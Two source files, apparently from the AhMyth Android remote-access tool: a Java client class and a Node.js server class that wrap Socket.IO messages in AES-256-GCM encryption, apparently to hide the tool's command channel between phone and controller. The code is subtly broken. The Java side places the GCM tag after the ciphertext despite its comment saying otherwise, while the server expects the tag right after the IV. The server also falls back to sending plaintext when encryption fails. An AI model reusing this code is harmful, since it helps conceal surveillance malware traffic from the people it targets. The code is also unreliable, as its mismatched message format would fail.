File: AhMyth-Client/app/src/main/java/ahmyth/mine/king/ahmyth/crypto/SocketEncryption.java
package ahmyth.mine.king.ahmyth.crypto;

import android.util.Base64;
import android.util.Log;

import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.ByteBuffer;
import java.security.SecureRandom;

public class SocketEncryption {
    
    private static final String TAG = "SocketEncryption";
    private static final String ALGORITHM = "AES/GCM/NoPadding";
    private static final int KEY_LENGTH = 32; // 256 bits
    private static final int IV_LENGTH = 16;  // 128 bits
    private static final int TAG_LENGTH = 128; // 128 bits for GCM tag
    
    private SecretKeySpec secretKey;
    
    public SocketEncryption() {
    }
    
    /**
     * Set the encryption key
     * @param keyBytes 32-byte encryption key
     */
    public void setKey(byte[] keyBytes) {
        if (keyBytes == null || keyBytes.length != KEY_LENGTH) {
            throw new IllegalArgumentException("Key must be " + KEY_LENGTH + " bytes");
        }
        this.secretKey = new SecretKeySpec(keyBytes, "AES");
    }
    
    /**
     * Set the encryption key from Base64 string
     * @param keyBase64 Base64 encoded key
     */
    public void setKeyFromBase64(String keyBase64) {
        byte[] keyBytes = Base64.decode(keyBase64, Base64.DEFAULT);
        setKey(keyBytes);
    }
    
    /**
     * Generate a random encryption key
     * @return 32-byte encryption key
     */
    public static byte[] generateKey() {
        SecureRandom random = new SecureRandom();
        byte[] key = new byte[KEY_LENGTH];
        random.nextBytes(key);
        return key;
    }
    
    /**
     * Encrypt data using AES-256-GCM
     * @param data Data to encrypt
     * @return Base64 encoded encrypted data (iv + tag + ciphertext)
     */
    public String encrypt(String data) throws Exception {
        if (secretKey == null) {
            throw new IllegalStateException("Encryption key not set");
        }
        
        try {
            // Generate random IV
            byte[] iv = new byte[IV_LENGTH];
            SecureRandom random = new SecureRandom();
            random.nextBytes(iv);
            
            // Initialize cipher
            Cipher cipher = Cipher.getInstance(ALGORITHM);
            GCMParameterSpec parameterSpec = new GCMParameterSpec(TAG_LENGTH, iv);
            cipher.init(Cipher.ENCRYPT_MODE, secretKey, parameterSpec);
            
            // Encrypt data
            byte[] encrypted = cipher.doFinal(data.getBytes("UTF-8"));
            
            // Combine iv + encrypted data (tag is included in encrypted)
            ByteBuffer byteBuffer = ByteBuffer.allocate(IV_LENGTH + encrypted.length);
            byteBuffer.put(iv);
            byteBuffer.put(encrypted);
            byte[] combined = byteBuffer.array();
            
            // Return Base64 encoded
            return Base64.encodeToString(combined, Base64.NO_WRAP);
            
        } catch (Exception e) {
            Log.e(TAG, "Encryption error", e);
            throw e;
        }
    }
    
    /**
     * Decrypt data using AES-256-GCM
     * @param encryptedData Base64 encoded encrypted data
     * @return Decrypted data
     */
    public String decrypt(String encryptedData) throws Exception {
        if (secretKey == null) {
            throw new IllegalStateException("Encryption key not set");
        }
        
        try {
            // Decode from Base64
            byte[] combined = Base64.decode(encryptedData, Base64.NO_WRAP);
            
            // Extract IV and encrypted data
            ByteBuffer byteBuffer = ByteBuffer.wrap(combined);
            byte[] iv = new byte[IV_LENGTH];
            byteBuffer.get(iv);
            byte[] encrypted = new byte[byteBuffer.remaining()];
            byteBuffer.get(encrypted);
            
            // Initialize cipher
            Cipher cipher = Cipher.getInstance(ALGORITHM);
            GCMParameterSpec parameterSpec = new GCMParameterSpec(TAG_LENGTH, iv);
            cipher.init(Cipher.DECRYPT_MODE, secretKey, parameterSpec);
            
            // Decrypt data
            byte[] decrypted = cipher.doFinal(encrypted);
            
            return new String(decrypted, "UTF-8");
            
        } catch (Exception e) {
            Log.e(TAG, "Decryption error", e);
            throw e;
        }
    }
    
    /**
     * Check if encryption key is set
     * @return true if key is set
     */
    public boolean isKeySet() {
        return secretKey != null;
    }
}

File: AhMyth-Server/app/crypto/SocketEncryption.js
const crypto = require('crypto');

class SocketEncryption {
    constructor() {
        this.algorithm = 'aes-256-gcm';
        this.keyLength = 32; // 256 bits
        this.ivLength = 16;  // 128 bits
        this.tagLength = 16; // 128 bits
    }

    /**
     * Generate a random encryption key
     * @returns {Buffer} 32-byte encryption key
     */
    generateKey() {
        return crypto.randomBytes(this.keyLength);
    }

    /**
     * Encrypt data using AES-256-GCM
     * @param {string|Buffer} data - Data to encrypt
     * @param {Buffer} key - 32-byte encryption key
     * @returns {string} Base64 encoded encrypted data (iv + tag + ciphertext)
     */
    encrypt(data, key) {
        try {
            const iv = crypto.randomBytes(this.ivLength);
            const cipher = crypto.createCipheriv(this.algorithm, key, iv);
            
            let encrypted = cipher.update(
                typeof data === 'string' ? data : data.toString(),
                'utf8',
                'hex'
            );
            encrypted += cipher.final('hex');
            
            const tag = cipher.getAuthTag();
            
            // Combine iv + tag + encrypted data
            const combined = Buffer.concat([
                iv,
                tag,
                Buffer.from(encrypted, 'hex')
            ]);
            
            return combined.toString('base64');
        } catch (error) {
            console.error('Encryption error:', error);
            throw error;
        }
    }

    /**
     * Decrypt data using AES-256-GCM
     * @param {string} encryptedData - Base64 encoded encrypted data
     * @param {Buffer} key - 32-byte encryption key
     * @returns {string} Decrypted data
     */
    decrypt(encryptedData, key) {
        try {
            const combined = Buffer.from(encryptedData, 'base64');
            
            // Extract iv, tag, and encrypted data
            const iv = combined.slice(0, this.ivLength);
            const tag = combined.slice(this.ivLength, this.ivLength + this.tagLength);
            const encrypted = combined.slice(this.ivLength + this.tagLength);
            
            const decipher = crypto.createDecipheriv(this.algorithm, key, iv);
            decipher.setAuthTag(tag);
            
            let decrypted = decipher.update(encrypted, undefined, 'utf8');
            decrypted += decipher.final('utf8');
            
            return decrypted;
        } catch (error) {
            console.error('Decryption error:', error);
            throw error;
        }
    }

    /**
     * Create a wrapper for socket.emit with encryption
     * @param {Socket} socket - Socket.IO socket instance
     * @param {Buffer} key - Encryption key
     * @returns {Function} Wrapped emit function
     */
    createEncryptedEmit(socket, key) {
        const originalEmit = socket.emit.bind(socket);
        const self = this;
        
        return function(event, data, ...args) {
            // Don't encrypt handshake and connection events
            if (event === 'handshake' || event === 'error' || event === 'disconnect') {
                return originalEmit(event, data, ...args);
            }
            
            try {
                const encrypted = self.encrypt(JSON.stringify(data), key);
                return originalEmit(event, { encrypted: true, data: encrypted }, ...args);
            } catch (error) {
                console.error('Failed to encrypt message:', error);
                return originalEmit(event, data, ...args);
            }
        };
    }

    /**
     * Create a wrapper for socket.on with decryption
     * @param {Socket} socket - Socket.IO socket instance
     * @param {Buffer} key - Encryption key
     * @returns {Function} Wrapped on function
     */
    createEncryptedOn(socket, key) {
        const originalOn = socket.on.bind(socket);
        const self = this;
        
        return function(event, callback) {
            return originalOn(event, function(data, ...args) {
                // Don't decrypt handshake and connection events
                if (event === 'handshake' || event === 'error' || event === 'disconnect') {
                    return callback(data, ...args);
                }
                
                try {
                    if (data && data.encrypted) {
                        const decrypted = self.decrypt(data.data, key);
                        const parsed = JSON.parse(decrypted);
                        return callback(parsed, ...args);
                    }
                } catch (error) {
                    console.error('Failed to decrypt message:', error);
                }
                
                return callback(data, ...args);
            });
        };
    }
}

module.exports = new SocketEncryption();

